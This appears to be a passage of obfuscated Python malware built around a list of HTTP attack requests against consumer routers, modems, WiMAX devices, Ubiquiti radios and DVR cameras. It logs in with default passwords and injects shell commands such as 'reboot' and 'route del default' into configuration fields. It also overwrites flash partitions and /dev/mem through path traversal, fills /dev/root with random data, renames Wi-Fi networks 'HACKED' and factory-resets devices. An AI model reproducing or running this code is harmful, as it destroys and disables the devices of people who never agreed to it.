%%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&DDNS_ENABLE=on&DDNS_PROVIDER=0&DDNS_TYPE=0&DDNS_HOST=%60reboot%60&DDNS_DOMAIN=hacked&DDNS_USERNAME=hacked&DDNS_PASSWORD=hacked&btnSubmit=1' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'mediatekwimax' , '302 Found.*Server: httpd.*Location: login.html' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=admin&PASSWORD=admin' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=user&PASSWORD=user' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=guest' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=linkem123' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-lan.html&SERVICE=dhcpd&DHCPD_STATIC_LEASE=&DHCPD_DNS=0%2C0.0.0.0+1%2C0.0.0.0+1%2C0.0.0.0&DHCPD_ENABLE=0&DHCPD_START_IP=192.168.0.2&DHCPD_END_IP=192.168.0.254&DHCPD_LEASE_TIME=1440&DHCPD_RELAY_IP=0.0.0.0&First_Type=1&Second_Type=1&Third_Type=1' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /mtk.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wifi-wlan.MT5921.html&SERVICE=wifi&SLEEP=7&WLAN_WifiEnable=0&WLAN_WscAction=&WLAN_WscConfMode=&WLAN_AuthMode=&WLAN_DefaultKeyID=1%3B1%3B&WLAN_EncrypType=&WLAN_GenPin=&WLAN_WscConfStatus=1&WLAN_SSID1=HACKED&WLAN_SSID2=MTK2' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wifi-wlan.MT5921.html&SERVICE=wifi&SLEEP=7&WLAN_WifiEnable=0&WLAN_WscAction=&WLAN_WscConfMode=&WLAN_AuthMode=&WLAN_DefaultKeyID=1%3B1%3B&WLAN_EncrypType=&WLAN_GenPin=&WLAN_WscConfStatus=1&WLAN_SSID1=HACKED&WLAN_SSID2=MTK2' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=adv-nat.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_ENABLE=1&NETFILTER_DMZ_HOST=8.8.8.8' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-lan.html&SLEEP=3&SERVICE=networking_lan&LAN_IP=10.%%RAND16%%&LAN_MASK=255.255.255.254' , 'POST /voip_ip_zyims.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=zysc-acct.html%3Find%3D1&SERVICE=sc&SUC_RET=3&ACTION=disconnect&ACCT=1' , 'POST /voip_ip_zyims.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=zysc-acct.html%3Find%3D1&SERVICE=sc&SUC_RET=3&ACTION=disconnect&ACCT=2' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /mtk.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=sys-log.html&SLEEP=1&SERVICE=sysklogd&SYSLOGD_LOG_ENABLE=1&SYSLOGD_REMOTE_LOG=1&LOG_ENABLE=on&SYSLOGD_LOG_LEVEL=7&REMOTE_LOG=on&SYSLOGD_REMOTE_HOST=%60reboot%60&SYSLOGD_REMOTE_PORT=514' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-ddns.html&DDNS_ENABLE=1&DDNS_WILDCARD=1&DDNS_BACKUP_MX=0&DDNS_MX=0&SERVICE=ddns&DDNS_PROVIDER=0&DDNS_TYPE=0&DDNS_HOST=%60reboot%60&DDNS_DOMAIN=hacked&DDNS_USERNAME=hacked&DDNS_PASSWORD=hacked&DDNS_IPPOLICY=0' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=sys-log.html&SLEEP=1&SERVICE=sysklogd&SYSLOGD_LOG_ENABLE=1&SYSLOGD_REMOTE_LOG=1&LOG_ENABLE=on&SYSLOGD_LOG_LEVEL=7&REMOTE_LOG=on&SYSLOGD_REMOTE_HOST=%60reboot%60&SYSLOGD_REMOTE_PORT=514' , 'POST /wmx_auth.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wmx-profile.html&SLEEP=1&WMX_AUTH_MODE=0' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' , 'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /reboot.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'mediatekrpc' , '302 Found.*Server: httpd.*Location: login\.asp' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=admin&PASSWORD=admin&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=user&PASSWORD=user&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=guest&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=9&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DHCPD_ENABLE&VALUE_1=0&ACTION_2=sncfgSet&NAME_2=DHCPD_START_IP&VALUE_2=192.168.0.100&ACTION_3=sncfgSet&NAME_3=DHCPD_END_IP&VALUE_3=192.168.0.199&ACTION_4=sncfgSet&NAME_4=DHCPD_LEASE_TIME&VALUE_4=1440&ACTION_5=sncfgSet&NAME_5=DHCPD_RELAY_IP&VALUE_5=0.0.0.0&ACTION_6=sncfgSet&NAME_6=DHCPD_METRIC&VALUE_6=30&ACTION_7=service&NAME_7=dhcpd&VALUE_7=reload&ACTION_8=service&NAME_8=lan&VALUE_8=reload&ACTION_9=service&NAME_9=wifi&VALUE_9=reload' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=25&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=WLAN_Channel&VALUE_1=6&ACTION_2=sncfgSet&NAME_2=WLAN_WirelessMode&VALUE_2=9&ACTION_3=sncfgSet&NAME_3=WLAN_TXPOWER_NOR&VALUE_3=10&ACTION_4=sncfgSet&NAME_4=WLAN_BeaconPeriod&VALUE_4=100&ACTION_5=sncfgSet&NAME_5=WLAN_DtimPeriod&VALUE_5=1&ACTION_6=sncfgSet&NAME_6=WLAN_SSID1&VALUE_6=HACKED&ACTION_7=sncfgSet&NAME_7=ManualSetSSID&VALUE_7=1&ACTION_8=sncfgSet&NAME_8=WLAN_EncrypType&VALUE_8=AES%3B&ACTION_9=sncfgSet&NAME_9=WLAN_AuthMode&VALUE_9=WPA2PSK%3B&ACTION_10=sncfgSet&NAME_10=WLAN_HideSSID&VALUE_10=0%3B&ACTION_11=sncfgSet&NAME_11=WLAN_DefaultKeyID&VALUE_11=&ACTION_12=sncfgSet&NAME_12=WLAN_Key1Type&VALUE_12=&ACTION_13=sncfgSet&NAME_13=WLAN_Key2Type&VALUE_13=&ACTION_14=sncfgSet&NAME_14=WLAN_Key3Type&VALUE_14=&ACTION_15=sncfgSet&NAME_15=WLAN_Key4Type&VALUE_15=&ACTION_16=sncfgSet&NAME_16=WLAN_WAPIPassType&VALUE_16=1%3B&ACTION_17=sncfgSet&NAME_17=WLAN_WPAPSK1&VALUE_17=XnSKDUJjRL&ACTION_18=sncfgSet&NAME_18=WLAN_Key1Str1&VALUE_18=XnSKDUJjRL&ACTION_19=sncfgSet&NAME_19=WLAN_Key2Str1&VALUE_19=XnSKDUJjRL&ACTION_20=sncfgSet&NAME_20=WLAN_Key3Str1&VALUE_20=XnSKDUJjRL&ACTION_21=sncfgSet&NAME_21=WLAN_Key4Str1&VALUE_21=XnSKDUJjRL&ACTION_22=sncfgSet&NAME_22=WLAN_WAPIPassword1&VALUE_22=XnSKDUJjRL&ACTION_23=sncfgSet&NAME_23=WLAN_HT_BW&VALUE_23=0&ACTION_24=sncfgSet&NAME_24=WLAN_SecondChannel&VALUE_24=0&ACTION_25=service&NAME_25=wifi&VALUE_25=switch' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=6&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=LAN_IP&VALUE_1=10.%%RAND8%%&ACTION_2=sncfgSet&NAME_2=LAN_MASK&VALUE_2=255.255.255.0&ACTION_3=service&NAME_3=lan&VALUE_3=reload&ACTION_4=sncfgSet&NAME_4=DNSPROXY_DEVICE_NAME&VALUE_4=hacked.modem&ACTION_5=service&NAME_5=totd&VALUE_5=reload&ACTION_6=service&NAME_6=wifi&VALUE_6=reload' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=4&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DHCPD_NTP&VALUE_1=2%2C%60route%20del%20default%60+0%2C0.0.0.0+0%2C0.0.0.0&ACTION_2=service&NAME_2=dhcpd&VALUE_2=reload&ACTION_3=service&NAME_3=lan&VALUE_3=reload&ACTION_4=service&NAME_4=wifi&VALUE_4=reload' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=3&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DNSPROXY_DEVICE_NAME&VALUE_1=%60route%20del%20default%60&ACTION_2=service&NAME_2=totd&VALUE_2=reload&ACTION_3=service&NAME_3=wifi&VALUE_3=reload' , 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' , 'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' , 'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=3&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DNSPROXY_DEVICE_NAME&VALUE_1=%60reboot%60&ACTION_2=service&NAME_2=totd&VALUE_2=reload&ACTION_3=service&NAME_3=wifi&VALUE_3=reload' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'mdmweb' , 'Server: lighttpd.*xmlns=.*;;.*href=include/style.css' , 'POST /cgi-bin/qcmap_auth HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ntype=login&pwd=21232f297a57a5a743894a0e4a801fc3&timeout=300&user=admin' , 'POST /cgi-bin/qcmap_auth HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ntype=login&pwd=admin&timeout=300&user=admin' , 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetMobileAP&mask=2&autoconnect=0&autoconnect_result=0&roaming=0&roaming_result=0&token=%%CUSTOM1%%' , 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=ModifyProfile&mask=0&type=1&index=0&name=EVO&apn=default.hacked&username=default.hacked&password=default.hacked&auth_protocol=0&pdn_type=1&rat_type=3&pdn_level_user=&pdn_level_password=&pdn_level_label=&pdn_level_auth_type=0&token=%%CUSTOM1%%' , 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetWLANConfig&mask=0&wifi_enable=0&wifi_ssid=DEFAULT_PW&wifi_hide=0&wifi_band=1&wifi_mode=2&wifi_channel=0&wifi_max_clients=10&wifi_EncrypType=3&wifi_AuthMode=1&wifi_wep_default_key=&wifi_wep_key_len=&wifi_Key1Type=&wifi_Key1Str1=&wifi_Key2Type=&wifi_Key2Str1=&wifi_Key3Type=&wifi_Key3Str1=&wifi_Key4Type=&wifi_Key4Str1=&wifi_wpa_password=%%RAND8%%&wifi_wapi_key_type=0&wifi_wapi_key=&wifi_HT_BW=0&wifi_SecondChannel=1&wifi_beaconPeriod=20&wifi_dtimPeriod=1&token=%%CUSTOM1%%' , 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetLanConfig&Mask=1&lan_gw_addrs=192.168.%%RAND16%%&lan_sub=255.255.255.254&lan_dhcp=1&lan_dhcp_start=192.168.%%COMP16%%&lan_dhcp_end=192.168.%%COMP16%%&lan_dhcp_lease=30&token=%%CUSTOM1%%' , 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetNetworkMode&mask=0&mode=2&token=%%CUSTOM1%%' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'airosfile' , 'Cookie: AIR' , 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../etc/passwd"\r\n\r\ntest:D/jrO7OLO39l.:0:0:Administrator:/etc/persistent:/bin/sh\r\n--XXX--\r\n' , 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock5"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' , 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock4"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' , 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock6"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' , 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mem"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'xionghash' , 'Server: uc-httpd' , 'GET ../../../../../mnt/mtd/Config/Account1 HTTP/1.0\r\n\r\n' , 'xtsxpand:iris_small:1' , 'xtsxpand:focus_near:1' , 'xtsxpand:zoom_tile:1' , 'xtsxpand:direction_down:1' , 'xnrxpand:irissmall:1' , 'xnrxpand:focusnear:1' , 'xnrxpand:zoomtile:1' , 'xnrxpand:directiondown:1' , 'xtsxpand:iris_small:2' , 'xtsxpand:focus_near:2' , 'xtsxpand:zoom_tile:2' , 'xtsxpand:direction_down:2' , 'xnrxpand:irissmall:2' , 'xnrxpand:focusnear:2' , 'xnrxpand:zoomtile:2' , 'xnrxpand:directiondown:2' , 'xtsxpand:iris_small:3' , 'xtsxpand:focus_near:3' , 'xtsxpand:zoom_tile:3' , 'xtsxpand:direction_down:3' , 'xnrxpand:irissmall:3' , 'xnrxpand:focusnear:3' , 'xnrxpand:zoomtile:3' , 'xnrxpand:directiondown:3' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'hnap' , '(HTTP|HTML|html)' , 'GET /HNAP1/ HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'hnapxpand:admin/admin:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/1234:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/password:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:user/user:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:user/1234:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:user/:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:cisco/cisco:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:Cisco/Cisco:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:cusadmin/password:SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/admin:GetDeviceSettings/`cat${IFS}/dev/urandom${IFS}>/dev/root`:GetDeviceSettings:' , 'hnapxpand:admin/admin:GetDeviceSettings/SetWanSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/admin:GetDeviceSettings:SetWanSettings:Static10.%%RAND8%%255.255.255.010.%%COMP8%%' , 'hnapxpand:admin/admin:GetDeviceSettings/`route${IFS}del${IFS}default`:GetDeviceSettings:' , 'hnapxpand:admin/admin:GetDeviceSettings/SetFactoryDefault:SetFactoryDefault:' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , ] if 51 - 51: OOOoOooO / OOOoOooO if 42 - 42: o0oooooO % Oooo + Oo0 O0O = "SPLTX" if 58 - 58: o0ooO / O0oo0OOOOO00 + O0oo / Ii11i1iIi - I11I1Ii if 17 - 17: i1 time . sleep ( 1 ) if 82 - 82: IIiIIiIii1I - I11I1Ii % IIiIii1iI % O0oo0OOOOO00 - Oo0Oo for OoOoOoo0OOo00 in range ( len ( o0O0oO ) ) : for o00OOO in range ( len ( o0O0oO [ OoOoOoo0OOo00 ] ) ) : Oo00oO0O = re . search ( 'hnapxpand:([^:/]*)/([^:]*):([^:]+):([^:]+):(.*)$' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] ) if Oo00oO0O : o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /HNAP1/ HTTP/1.0\r\nAuthorization: Basic %s\r\nContent-Type: text/xml; charset="utf-8"\r\nSOAPAction: http://purenetworks.com/HNAP1/%s\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\n<%s xmlns="http://purenetworks.com/HNAP1/">%s' % ( binascii . b2a_base64 ( '%s:%s' % ( Oo00oO0O . group ( 1 ) , Oo00oO0O . group ( 2 ) ) ) . strip ( ) , Oo00oO0O . group ( 3 ) , Oo00oO0O . group ( 4 ) , Oo00oO0O . group ( 5 ) , Oo00oO0O . group ( 4 ) ) Oo00oO0O = re . search ( 'xtsxpand:([^:]+):(\d+)' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] ) if Oo00oO0O : o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /dvrcmd HTTP/1.1\r\nHost: %%%%TARGETIP%%%%\r\nContent-Type: text/plain;charset=UTF-8\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\nTSCommand=ptz_req&req=start¶m=%s&channel=%s&stream=1' % ( Oo00oO0O . group ( 1 ) , Oo00oO0O . group ( 2 ) ) Oo00oO0O = re . search ( 'xnrxpand:([^:]+):(\d+)' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] ) if Oo00oO0O : o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /dvrcmd HTTP/1.1\r\nHost: %%%%TARGETIP%%%%\r\nContent-Type: text/plain;charset=UTF-8\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\ncommand=ptz_req&req=start¶m=%s&channel=%s&stream=1' % ( Oo00oO0O . group ( 1 ) , 